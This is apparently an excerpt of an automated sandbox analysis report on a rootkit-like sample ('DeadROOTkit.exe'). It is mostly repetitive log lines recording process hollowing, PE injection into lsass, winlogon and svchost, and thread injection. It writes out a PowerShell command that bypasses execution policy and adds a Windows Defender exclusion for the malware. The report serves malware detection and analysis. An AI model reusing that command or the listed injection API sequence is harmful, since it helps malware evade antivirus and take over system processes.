                          Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
                          Adds a directory exclusion to Windows Defender
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'Jump to behavior
                          Bypasses PowerShell execution policy
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
                          Contains functionality to inject code into remote processes
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140002430 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,6_2_0000000140002430
                          Creates a thread in another existing process (thread injection)
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: AF1E2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 87992AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 53772AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D532AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 67D2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B392AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EBFD2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 59042AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A9E72AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 73162AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4E862AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 473C2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6F9D2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 83BC2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D3F72AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A4152AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: BDF32AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: C0262AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: C9F32AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 645B2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 7B2A2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4F62AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 2AB42AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4ADB2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\spoolsv.exe EIP: 1992AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25DA2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F5352AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0D62AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FFB2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C2572AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B942AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 66932AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13EF2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D572AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 69B42AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC742AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5DA72AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 199D2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B82AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27BC2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B4B2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8BA2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5932AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC652AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 78742AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D0A2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 641A2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60DB2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F7C2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 52342AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DA92AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 602E2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C5AA2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F8FD2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F33D2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 48772AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FB21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EAD62AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 86DD2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4DB12AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6F952AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10C21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10C21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EF21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DC21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EC21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F321CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ED21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13E21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F021CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F321CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E221CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F221CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15B21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B621CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F421CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F221CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13121CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AA21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F221CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F421CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ED21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C221CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A421CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13821CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9021CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C021CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14C21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D021CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9F21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13F21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B421CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D021CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5121CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6E21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9E21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E321CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EA21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10B21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EF21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B921CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1A21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F021CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F121CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13921CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B021CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5C21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9121CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5B21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EF21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EE21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F421CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7921CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12121CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DA21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1B412AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1B9F2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 38862AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\conhost.exe EIP: 2F792AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Users\Public\Deadsvchost.exe EIP: 21B42AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\schtasks.exe EIP: 3BB52AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E00B2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 562AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 942AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11C2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CEF02AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CEF62AB8Jump to behavior
                          Injects a PE file into a foreign processes
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF1E0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B940000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166930000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8BA0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 151C5AA0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F8FD0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16BF33D0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1A348770000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2FB0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1F3EAD60000 value starts with: 4D5AJump to behavior
